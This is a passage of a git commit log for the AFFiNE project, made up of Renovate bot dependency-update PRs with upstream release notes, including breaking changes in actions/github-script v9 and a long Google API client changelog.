schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMDkuNCIsInVwZGF0ZWRJblZlciI6IjQzLjIwOS40IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com> |
||
|
|
edc87e38df |
chore: bump up RevenueCat/purchases-ios-spm version to from: "5.76.0" (#15077)
This PR contains the following updates: | Package | Update | Change | |---|---|---| | [RevenueCat/purchases-ios-spm](https://redirect.github.com/RevenueCat/purchases-ios-spm) | minor | `from: "5.75.0"` → `from: "5.76.0"` | --- ### Release Notes <details> <summary>RevenueCat/purchases-ios-spm (RevenueCat/purchases-ios-spm)</summary> ### [`v5.76.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.75.0...5.76.0) [Compare Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.75.0...5.76.0) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMDkuNCIsInVwZGF0ZWRJblZlciI6IjQzLjIwOS40IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
489702eb66 |
chore: bump up actions/github-script action to v9 (#15074)
This PR contains the following updates: | Package | Type | Update | Change | |---|---|---|---| | [actions/github-script](https://redirect.github.com/actions/github-script) | action | major | `v8` → `v9` | --- ### Release Notes <details> <summary>actions/github-script (actions/github-script)</summary> ### [`v9.0.0`](https://redirect.github.com/actions/github-script/releases/tag/v9.0.0) [Compare Source](https://redirect.github.com/actions/github-script/compare/v9.0.0...v9.0.0) **New features:** - **`getOctokit` factory function** — Available directly in the script context. Create additional authenticated Octokit clients with different tokens for multi-token workflows, GitHub App tokens, and cross-org access. See [Creating additional clients with `getOctokit`](https://redirect.github.com/actions/github-script#creating-additional-clients-with-getoctokit) for details and examples. - **Orchestration ID in user-agent** — The `ACTIONS_ORCHESTRATION_ID` environment variable is automatically appended to the user-agent string for request tracing. **Breaking changes:** - **`require('@​actions/github')` no longer works in scripts.** The upgrade to `@actions/github` v9 (ESM-only) means `require('@​actions/github')` will fail at runtime. If you previously used patterns like `const { getOctokit } = require('@​actions/github')` to create secondary clients, use the new injected `getOctokit` function instead — it's available directly in the script context with no imports needed. - `getOctokit` is now an injected function parameter. Scripts that declare `const getOctokit = ...` or `let getOctokit = ...` will get a `SyntaxError` because JavaScript does not allow `const`/`let` redeclaration of function parameters. Use the injected `getOctokit` directly, or use `var getOctokit = ...` if you need to redeclare it. - If your script accesses other `@actions/github` internals beyond the standard `github`/`octokit` client, you may need to update those references for v9 compatibility. ##### What's Changed - Add ACTIONS\_ORCHESTRATION\_ID to user-agent string by [@​Copilot](https://redirect.github.com/Copilot) in [#​695](https://redirect.github.com/actions/github-script/pull/695) - ci: use deployment: false for integration test environments by [@​salmanmkc](https://redirect.github.com/salmanmkc) in [#​712](https://redirect.github.com/actions/github-script/pull/712) - feat!: add getOctokit to script context, upgrade [@​actions/github](https://redirect.github.com/actions/github) v9, [@​octokit/core](https://redirect.github.com/octokit/core) v7, and related packages by [@​salmanmkc](https://redirect.github.com/salmanmkc) in [#​700](https://redirect.github.com/actions/github-script/pull/700) ##### New Contributors - [@​Copilot](https://redirect.github.com/Copilot) made their first contribution in [#​695](https://redirect.github.com/actions/github-script/pull/695) **Full Changelog**: <https://github.com/actions/github-script/compare/v8.0.0...v9.0.0> ### [`v9`](https://redirect.github.com/actions/github-script/compare/v8...v9) [Compare Source](https://redirect.github.com/actions/github-script/compare/v8.0.0...v9.0.0) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMDkuMCIsInVwZGF0ZWRJblZlciI6IjQzLjIwOS4wIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
e3349b458c |
chore: bump up apple-actions/import-codesign-certs action to v7 (#15075)
This PR contains the following updates: | Package | Type | Update | Change | |---|---|---|---| | [apple-actions/import-codesign-certs](https://redirect.github.com/apple-actions/import-codesign-certs) | action | major | `v6` → `v7` | --- ### Release Notes <details> <summary>apple-actions/import-codesign-certs (apple-actions/import-codesign-certs)</summary> ### [`v7.0.0`](https://redirect.github.com/Apple-Actions/import-codesign-certs/releases/tag/v7.0.0) [Compare Source](https://redirect.github.com/apple-actions/import-codesign-certs/compare/v7.0.0...v7.0.0) #### What's Changed - Switch from `ncc` to `esbuild` - Bump flatted from 3.4.1 to 3.4.2 by [@​dependabot](https://redirect.github.com/dependabot)\[bot] in [Apple-Actions#166](https://redirect.github.com/Apple-Actions/import-codesign-certs/pull/166) - Bump actions/setup-node from 6.2.0 to 6.3.0 by [@​dependabot](https://redirect.github.com/dependabot)\[bot] in [Apple-Actions#167](https://redirect.github.com/Apple-Actions/import-codesign-certs/pull/167) - Bump picomatch from 2.3.1 to 2.3.2 by [@​dependabot](https://redirect.github.com/dependabot)\[bot] in [Apple-Actions#168](https://redirect.github.com/Apple-Actions/import-codesign-certs/pull/168) - Bump knip from 5.78.0 to 6.2.0 by [@​dependabot](https://redirect.github.com/dependabot)\[bot] in [Apple-Actions#173](https://redirect.github.com/Apple-Actions/import-codesign-certs/pull/173) **Full Changelog**: <https://github.com/Apple-Actions/import-codesign-certs/compare/v6.1.0...v7.0.0> ### [`v7`](https://redirect.github.com/apple-actions/import-codesign-certs/compare/v6.1.0...v7.0.0) [Compare Source](https://redirect.github.com/apple-actions/import-codesign-certs/compare/v6.1.0...v7.0.0) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMDkuMCIsInVwZGF0ZWRJblZlciI6IjQzLjIwOS4wIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
eb32a5894e |
chore: bump up @googleapis/androidpublisher version to v36 (#15063)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@googleapis/androidpublisher](https://redirect.github.com/googleapis/google-api-nodejs-client) | [`^35.0.0` → `^36.0.0`](https://renovatebot.com/diffs/npm/@googleapis%2fandroidpublisher/35.1.1/36.0.0) |  |  | --- ### Release Notes <details> <summary>googleapis/google-api-nodejs-client (@​googleapis/androidpublisher)</summary> ### [`v36.0.0`](https://redirect.github.com/googleapis/google-api-nodejs-client/blob/HEAD/CHANGELOG.md#13600-2024-05-02) ##### ⚠ BREAKING CHANGES - **workloadmanager:** This release has breaking changes. - **serviceusage:** This release has breaking changes. - **servicenetworking:** This release has breaking changes. - **serviceconsumermanagement:** This release has breaking changes. - **securitycenter:** This release has breaking changes. - **redis:** This release has breaking changes. - **networkmanagement:** This release has breaking changes. - **iam:** This release has breaking changes. - **doubleclickbidmanager:** This release has breaking changes. - **dns:** This release has breaking changes. - **dataportability:** This release has breaking changes. - **dataplex:** This release has breaking changes. - **dataform:** This release has breaking changes. - **contentwarehouse:** This release has breaking changes. - **content:** This release has breaking changes. - **compute:** This release has breaking changes. - **beyondcorp:** This release has breaking changes. - **alloydb:** This release has breaking changes. - **aiplatform:** This release has breaking changes. ##### Features - **accessapproval:** update the API ([88f6ef5](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/88f6ef52f6b19a90962acb1604694da5e22af1d0)) - **admin:** update the API ([b6fff85](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b6fff8553fc561f5c16d8bd46ded439bb793ea8a)) - **adsense:** update the API ([5349cf9](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5349cf9808017b594380ade8c94aed81a3330ed2)) - **advisorynotifications:** update the API ([9c37105](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/9c371058f141e1b30567a74d35245c0d116e9f02)) - **aiplatform:** update the API ([56cde03](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/56cde03e4eb6283561515ecac8435ad28f49dda9)) - **alertcenter:** update the API ([10d8698](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/10d869861c193788a3150515b2d8ec323517bc38)) - **alloydb:** update the API ([51ad37e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/51ad37ee97ac19ca26c26c645f39f8d9d3fde0cd)) - **analyticsadmin:** update the API ([8b4c314](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/8b4c31451d3ace85c48b8a1170eac09024c518e0)) - **analyticshub:** update the API ([d06ce46](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d06ce46d020c92976660e2e9ee68f35f0e2da2f6)) - **androidmanagement:** update the API ([bb2dc2d](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/bb2dc2d1e3d99b2a27bfe9f1b517ab257cc886bf)) - **androidpublisher:** update the API ([f58a3c8](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f58a3c8544b91d6cb987f2b72f200e7b79eabe14)) - **appengine:** update the API ([543b45e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/543b45e8cad0556e923f2f44e61d3bf96675e1ca)) - **apphub:** update the API ([e9a8db0](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/e9a8db0b264dc78e526dae22ff7a33574406a360)) - **artifactregistry:** update the API ([5a5e4aa](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5a5e4aae48f826b6daec0493c4cfe79b4b0dfa4a)) - **authorizedbuyersmarketplace:** update the API ([351c7ed](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/351c7edca745cf8d996963e6816811eaaca09a04)) - **backupdr:** update the API ([9796834](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/97968343e02bd85538961138f02ed20976f53a02)) - **beyondcorp:** update the API ([7f20c02](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7f20c0238728cae35a37e06b95e7dbb8cad57e2e)) - **bigqueryconnection:** update the API ([0e56135](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/0e56135413c3799c0543bb45510dede96970cb63)) - **bigquery:** update the API ([72b5d21](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/72b5d21ed11f1bcde638a1240c02d6ce03906844)) - **bigtableadmin:** update the API ([ad68d8c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ad68d8c6e175573ebd5c54ec74328386d9dc8cd3)) - **blockchainnodeengine:** update the API ([7f0503c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7f0503cc2cf3b7d7f90f0518a1deb592a4f313a4)) - **chat:** update the API ([0810516](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/081051658a22c7bf2cd8915838608f53fb620cd6)) - **cloudasset:** update the API ([4eb45be](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4eb45bed03811fb3f5c18967a0c7128ced2ee011)) - **cloudbuild:** update the API ([d20db7b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d20db7be93195c69e6b1345bcf196aeab8b57b35)) - **clouddeploy:** update the API ([cd5014b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/cd5014bd87adbfbc2729f78f7d56bb4b8d42b7d7)) - **cloudsupport:** update the API ([ceb5503](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ceb5503e69b26a0838d8decc00ca17ebdcdda743)) - **compute:** update the API ([f84e98a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f84e98a33f39034e2cb7846fbc4c3fc6804a2ffa)) - **connectors:** update the API ([478d8c6](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/478d8c60beb0ccae9a89590f71802aa7843275e2)) - **contactcenteraiplatform:** update the API ([862d69b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/862d69b84cbbe5f9e6c34af4bfdfbe33990c9331)) - **contactcenterinsights:** update the API ([c1974c4](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c1974c4b7385c84fdb70cd3c05e5ad601dbb4272)) - **container:** update the API ([8cd9863](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/8cd986326583b69735627bae07263fad1595b7fb)) - **content:** update the API ([76546b8](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/76546b866ac0e675f27b2b9ab1727f4c821c17ac)) - **contentwarehouse:** update the API ([aa28685](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/aa286853fecaa5d45d80e33e309ea388ea6ece97)) - **dataflow:** update the API ([ddd9231](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ddd92315d9fff4a5a20493b1ce874f0974df3b82)) - **dataform:** update the API ([a43ddce](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a43ddced989c08697f803f6d167f771ae27ecbcb)) - **datamigration:** update the API ([f0e692d](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f0e692d9169793bc8abe3cd33982e36e04faf3ea)) - **dataplex:** update the API ([20e701c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/20e701c6dc51978418c70f58907d0d2c8d5d407d)) - **dataportability:** update the API ([50c5d63](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/50c5d63f83ccf4e91e27e7322062a8edc24b33cf)) - **datastream:** update the API ([57a62ef](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/57a62ef7920ab1ca1e18452b2749c3585a981736)) - **dialogflow:** update the API ([ddfc789](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ddfc789b5c0c567d2ddc8241448e260bfb7ad20f)) - **discoveryengine:** update the API ([ec40fe5](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ec40fe54ac9bc032c370f8eaf436489a10b04159)) - **discovery:** update the API ([8d42dab](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/8d42dab88214bc01e9a9678794b6015435b5071f)) - **displayvideo:** update the API ([90937cd](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/90937cda7d6475fd0f04ac2332f3351f53f08b22)) - **dlp:** update the API ([88f0a64](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/88f0a640104e95f5aa785b89658997746153915e)) - **dns:** update the API ([4688a5e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4688a5ef2114c8ffcc15890ee47949431915841c)) - **documentai:** update the API ([b07b1aa](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b07b1aa83a3be53769729f43afe252bab824b55a)) - **domains:** update the API ([d34c2a0](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d34c2a09071ea3431f88ce0b6be0757a9682f66e)) - **doubleclickbidmanager:** update the API ([0e6990d](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/0e6990d73d7c576483a84b4dce75a5fd7fe3c0ad)) - **eventarc:** update the API ([0c28816](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/0c2881683796bfbc7581c2b772ef6d630737ad02)) - **factchecktools:** update the API ([bd8d187](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/bd8d187f2fa9859b230c0292c509312b93fba7a5)) - **firestore:** update the API ([6d67fed](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/6d67fed98433e01900db319bc4747577cb6d6e3d)) - **games:** update the API ([99d63c1](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/99d63c1ce9e7a141ce34ca9ab3b85e7c24413357)) - **gkebackup:** update the API ([e90fb98](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/e90fb98d64548538cbb810258e9fde7b3f3561fc)) - **gkehub:** update the API ([d4c3244](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d4c3244d232a2788ef39e85a3ba451227446ebb2)) - **gmail:** update the API ([a4d9319](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a4d9319ad50bbfd9e27ed7b4ff865951b7dd1032)) - **iam:** update the API ([2e9117f](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/2e9117f73657e08bcea4de889f49bbeca4cb6882)) - **iap:** update the API ([db72cb3](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/db72cb3acc75efc17df7dd0d6b4418e17c1c3c81)) - **logging:** update the API ([4317a72](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4317a72ef5752de222fafdaadb4be75267fedd4f)) - **marketingplatformadmin:** update the API ([ff87055](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ff8705570be84e5c2b93bac53dc6dc38923137ef)) - **metastore:** update the API ([57b1763](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/57b1763cd49724b461a5f85f8a6ef1cdebfdd500)) - **migrationcenter:** update the API ([3f91b3a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3f91b3abc6c81c7848e127563207299631cb1c7c)) - **monitoring:** update the API ([b601933](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b6019332629f7f487a720bbedf58284f32bc84f2)) - **networkconnectivity:** update the API ([bb6e8ff](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/bb6e8ffe0ccc87c117b7acbecf2ad9a52ec76158)) - **networkmanagement:** update the API ([3c9d201](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3c9d20120e16a1c6df1c2cbac758d2fa28670c7b)) - **ondemandscanning:** update the API ([9efea7e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/9efea7ec8fa03709a875f4e8131bcdf059ddd403)) - **orgpolicy:** update the API ([9abcb3a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/9abcb3ab05e3f8ceac3d5f6fb77b69b6312d3d78)) - **paymentsresellersubscription:** update the API ([5c6228e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5c6228e8693db8d5c3797148f0f547063beb23f1)) - **privateca:** update the API ([c8bed74](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c8bed74402e19d48227929a3c387663650c713fd)) - **pubsub:** update the API ([985ba9b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/985ba9bb35f3bd9db382497be3ec99d4c309cff4)) - **recaptchaenterprise:** update the API ([cd6af58](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/cd6af586c85f638a9e59647f9e14e13fbf4500c4)) - **redis:** update the API ([2896261](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/28962616def25002b1ab7eb995f220ba87646894)) - regenerate index files ([7cbd403](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7cbd403f5f44d43aa9fb86f35b4b71ff16bf8511)) - **retail:** update the API ([5c3af10](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5c3af10dc0c01bcba9ac1dd306ece2641e576f66)) - **run:** update the API ([4adbdec](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4adbdec9d3771f3c024f978fab7897e547825b11)) - **searchads360:** update the API ([03ca122](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/03ca122fba8a0ae1bf3cb482aefefd17eeba6adf)) - **securitycenter:** update the API ([8b08aa2](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/8b08aa2ac1d8bb8eb264f8bda3089da60b4f4028)) - **serviceconsumermanagement:** update the API ([8878e94](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/8878e945849f0c8a2946789f554aa8f7d43d9db5)) - **servicecontrol:** update the API ([763243a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/763243a5a56fbc735a259bc8a0cd16046a9b5289)) - **servicenetworking:** update the API ([d481dce](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d481dce95d7f9f899d9b62f78933a731159f381c)) - **serviceusage:** update the API ([41b76ee](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/41b76ee8d6beeeb3bbccdcbbcd0853f610a54171)) - **sheets:** update the API ([74b2d05](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/74b2d057117112b9b6991f70dc47ac60a9945e82)) - **spanner:** update the API ([2d2e0f6](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/2d2e0f64b7ceb23e7695939c367d74c7ce14fc2b)) - **sqladmin:** update the API ([7cc6d5e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7cc6d5e1283e44228e54acf2bdb10bbe5436996c)) - **tpu:** update the API ([d6658ff](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d6658ff0af9efce119b420c5da8cfcab7b882276)) - **trafficdirector:** update the API ([69f9252](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/69f92522ff9920b35c5a07302f509f86c49485df)) - **verifiedaccess:** update the API ([33544fc](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/33544fca5d8da32c49b7c9a803e6f818cd71abcb)) - **workloadmanager:** update the API ([855fab4](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/855fab42662185d828978f3474b6eba492f4b674)) - **workstations:** update the API ([867515f](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/867515ff691803da59aac961866bb6afb224a642)) - **youtube:** update the API ([7452149](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7452149d3d70dd45b10ceff77310aa09b6c2c57d)) ##### Bug Fixes - **abusiveexperiencereport:** update the API ([dfd4aa1](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/dfd4aa1e515b9665f2fcdf4a13eecd267b386895)) - **acceleratedmobilepageurl:** update the API ([9b0387c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/9b0387c44997aab7f305900eee6fcb8801d3f7ee)) - **accesscontextmanager:** update the API ([413c833](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/413c833b3273a224f9df5fc36fae40669724e4fb)) - **acmedns:** update the API ([4199c73](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4199c734fcde97cd00126d4531c0acfe7f4aad9a)) - **addressvalidation:** update the API ([3c51f3f](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3c51f3f5214e6465f25825ee8f37a773bbc7b07e)) - **adexchangebuyer2:** update the API ([ec9384a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ec9384ab02f3f30493962122c90c0549c318c7d4)) - **adexperiencereport:** update the API ([8932647](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/8932647c6be056c97fff0754cf4198ae9b55e6bd)) - **admob:** update the API ([7b699f5](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7b699f5f9cc2f565811caf67a944eaa104d22efb)) - **adsensehost:** update the API ([e4373ed](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/e4373ed0b695c995317e6f735542a228df2022e7)) - **analyticsdata:** update the API ([9c8dcf8](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/9c8dcf8f9aae5858d453a0dae64ca9837672bc87)) - **analyticsreporting:** update the API ([4b2a5bd](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4b2a5bdaf8aca2a581fec1e7ee1f534eb9867dca)) - **analytics:** update the API ([f7f9cc4](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f7f9cc4b9f2bf47aedd233ecdfb43531b5dad3cd)) - **androiddeviceprovisioning:** update the API ([47d89cd](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/47d89cda619cdec6b83e826913e1ff92e090ced8)) - **androidenterprise:** update the API ([293c247](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/293c247fbf83fbe9b54c14cd991b69bfd9679996)) - **apigateway:** update the API ([7d02f2d](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7d02f2dae2c63f6cf62de73fc1d3e1381f9f7ce1)) - **apigeeregistry:** update the API ([f627870](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f62787095c2439b882896130c259cedb810114de)) - **apikeys:** update the API ([f2ab501](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f2ab50102415317c56bb20fb7c1894505c86a7e9)) - **area120tables:** update the API ([ba9d3e6](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ba9d3e6258f47ea0d0bb3dae9f484a9097f2bdad)) - **assuredworkloads:** update the API ([3dc3798](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/3dc3798f56c03f0cf7136eb5d5e625ef2c3c21ee)) - **batch:** update the API ([10727a4](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/10727a4ccab11bd1203fa95cb14131a67804e7a5)) - **biglake:** update the API ([ebfd8c6](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ebfd8c6610f83f7ed63d21705f7d1eb2ed6db2d0)) - **bigquerydatapolicy:** update the API ([4871975](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/48719750b35826c4f147f8dc8601c90188dc8bee)) - **bigquerydatatransfer:** update the API ([05b9fc8](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/05b9fc89e9f0b1b94092e50cef21b03044b836ba)) - **bigqueryreservation:** update the API ([9f226a3](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/9f226a3de413175cd44c76f45b19169010daaaa9)) - **billingbudgets:** update the API ([1190847](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/1190847e882070097b0ef0fc74f23c5f162ecd16)) - **binaryauthorization:** update the API ([a5ad874](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a5ad874a862e827b55278bd56f25d6efbcc797c6)) - **blogger:** update the API ([285aa94](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/285aa9455d6afe92001fa4373c7a153124d9bf21)) - **books:** update the API ([b95f9af](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b95f9aff24842b3e2132f74913fb794699ea55be)) - **businessprofileperformance:** update the API ([92abfea](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/92abfea3a06b9714b650f6846469a434ff9d8c71)) - **calendar:** update the API ([a040e6d](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a040e6d6ccbb5efbebd09db5e452e586072afc71)) - **certificatemanager:** update the API ([32dd53e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/32dd53e849a341afbd7f0f52548485167556f85d)) - **checks:** update the API ([37cb793](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/37cb793b61fbf605d4e94af20abbe6a75fab277d)) - **chromemanagement:** update the API ([2a9f611](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/2a9f611d836a86cb36e0288ee13818238fac9a02)) - **chromepolicy:** update the API ([5f2b01b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5f2b01b222e12e7719296d6dbc885aa8b029c47b)) - **chromeuxreport:** update the API ([c7af220](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c7af220ffb1f7c5ee56a7e6ad0a87d9ff4c0e8a1)) - **civicinfo:** update the API ([74c8d7b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/74c8d7be47d07654832eca7a82ff54ab727e556a)) - **classroom:** update the API ([2183745](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/2183745a478778c1009d91ab160f1546526c7746)) - **cloudbilling:** update the API ([f8baaac](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f8baaac306d170b837cf2eb544edae932d13ed98)) - **cloudchannel:** update the API ([a65c068](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a65c068d0595e90214d69be0ab74af66c80ad62d)) - **cloudcontrolspartner:** update the API ([5a7437b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5a7437badd218eb3b92544397baa440040d2f3a6)) - **clouderrorreporting:** update the API ([4c557f5](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4c557f5a186799c1f4abe3b7afa3b1481f187b14)) - **cloudfunctions:** update the API 